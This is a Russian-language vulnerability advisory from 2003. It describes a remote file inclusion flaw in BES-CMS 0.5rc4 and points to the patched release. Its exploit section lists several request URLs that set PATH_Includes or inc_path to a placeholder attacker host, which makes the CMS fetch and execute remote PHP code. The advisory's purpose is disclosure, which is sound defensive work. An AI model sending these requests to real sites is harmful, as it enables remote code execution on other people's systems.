Дата публикации: | 23.12.2003 |
Всего просмотров: | 1718 |
Опасность: | Высокая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | BES-CMS 0.x |
Уязвимые версии: bes-cms 0.5rc4
Описание: Уязвимость включения файлов обнаружена в 'bes-cms'. Удаленный пользователь может выполнить произвольные команды на целевой системе. Уязвимость включения файлов обнаружена в нескольких сценариях ('index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php file', 'Include/functions_hacking.php', 'Include/functions_message.php', и 'Include/Start.php'). В результате удаленный атакующий может выполнить произвольный PHP код на уязвимой системе. Пример/Эксплоит: Including of file : (if register_globals=ON): - http://[target]/index.inc.php?PATH_Includes=http://[attacker]/ http://[target]/Members/index.inc.php?PATH_Includes=http://[attacker]/ http://[target]/Members/root/index.inc.php?PATH_Includes=http://[attacker]/ Could include the file : http://[attacker]/actions_default.php - http://[target]/Include/functions_folder.php?PATH_Includes= http://[attacker]/ Could include the files : http://[attacker]/functions_folder_modules.php http://[attacker]/functions_folder_plugins.php http://[attacker]/functions_folder_files.php - http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=usershow http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=logger Could include the file : http://[attacker]/functions_user.php - http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=send_bug&UserDetails[LOGGED_IN]=YES Could include the file : http://[attacker]/functions_error.php - http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=content_view Could include the file : http://[attacker]/functions_message_docTypes.php - http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=search Could include the file : http://[attacker]/functions_general.php - http://[target]/Include/functions_message.php?PATH_Includes= http://[attacker]/ Could include the files : http://[attacker]/functions_message_docTypes.php http://[attacker]/functions_message_edit.php - http://[target]/Include/Start.php?inc_path=http://[attacker]/ Could include the file : http://[attacker]/Include/vars.php URL производителя:http://bes.h6p.org/ Решение:Установите обновленную версию программы: http://bes.h6p.org/data/downloads/bes-cms_0.5.4.tar.gz |
|
Ссылки: | BES-CMS including file vulnerability |